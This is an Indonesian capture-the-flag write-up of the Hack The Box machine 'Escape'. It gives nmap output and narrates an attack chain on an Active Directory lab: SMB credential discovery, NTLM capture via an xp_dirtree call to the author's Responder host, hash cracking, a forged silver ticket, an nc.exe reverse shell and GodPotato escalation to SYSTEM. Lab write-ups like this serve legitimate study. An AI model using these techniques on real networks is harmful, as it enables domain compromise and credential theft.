Escape
Information Gathering
Port and Service
# nmap -p- -sVC --min-rate 1000 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.35s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-22 16:06:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2025-04-22T16:08:29+00:00; +8h00m00s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-22T16:03:42
|_Not valid after: 2055-04-22T16:03:42
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:08:29+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-22T16:07:49
|_ start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
Initial Access - PublicUser
SMB Anonymous access
Disini saya mencoba melakukan SMB Anonymous access dan menemukan terdapat folder yang menarik yaitu folder "Public"
disini saya langsung connect ke SMB untuk melihat isi dari folder public tersebut
didalam folder tersebut terdapat file "SQL Server Procedures.pdf", selanjutnya saya transfer file tersebut ke lokal dan disini saya mendapatkan credential

sesuai dengan informasi pada pdf tersebut credential tersebut digunakan untuk SQL Server, disini saya akan mengaksesnya menggunakan impacket-mssqlclient
disini saya berhasil masuk.
Sql_svc Via NTLM Poisoning
disini user tersebut memiliki akses terbatas, akan tetapi dapat menjalankan xp_dirtree. disini saya akan melakukan NTLM Poisoning dengan Responder
Capturing sql_svc NTLMv2
pertama saya menjalankan listener responder di terminal
selanjutnya saya menjalankan xp_dirtree \\10.10.14.5\s (IP address saya)
pada responder, disini terdapat sebuah event yang masuk, ini adalah NTLM dari sql_svc
selanjutnya saya akan crack NTLMv2 tersebut dengan menggunakan hashcat
disini saya berhasil cracking hash tersebut
disini saya mencoba untuk terkoneksi menggunakn impacket-mssqlclient
sayangnya disini saya tidak dapat melakukan command execution, selanjutnya saya mencoba memeriksa apakah user tersebut bisa untuk winrm atau tidak
user tersebut dapat digunakan untuk winrm
Administrator Via Silver Ticket and Godpotato
Disini saya memeriksa Privilege Information current user (sql_svc)
tidak ada yang menarik. disini saya akan mencoba silver ticket untuk menaikan hak aksesnya, saya melakukan silver ticket karena saya pikir user ini memiliki spn dan berjalan pada mssql. sebetulnya ini menjadi salah satu hal yang menarik, dikutip dari 0xdf writeup bahwa sql_svc dapat digunakan untuk silver ticket untuk alasan yang tidak disengaja

disini saya juga sudah memastikan user spn yang terdapat pada mesin tersebut dan hasilnya saya tidak menemukan spn sql_svc



lanjut, disini saya membuat TGS ticket dengan menggunakan impacket-ticketer. sebelum menggunakan impacket-ticketer saya membutuhkan beberapa informasi seperti
User NTLM
Domain SID
spn (optional)
User NTLM
Domain SID
Create Ticket
bisa juga menggunakan
kemudian sinkronasi timedatenya untuk kerberos
selanjutnya connect ke mssql dengan impacket-mssqlclient dan argument -k untuk menggunakan kerberos authentication
berhasil terkoneksi ke mssql sebagai Administrator, selanjutnya saya melakukan verifikasi privilegenya
dapat dilihat pada output tersebut disini user tersebut telah memiliki SeImpersonatePrivilege yang memungkinkan saya melakukan abuse terhadap privilege tersebut dengan Godpotato.
sebelumnya untuk kemudahan menjalankan perintah saya melakukan reverse shell dengan memunggah nc.exe kemudian saya juga memunggah godpotato.exe.
part terakhir, disini saya akan menjalankan godpotato.exe
disini saya telah berhasil mendapatkan nt authority\system
Last updated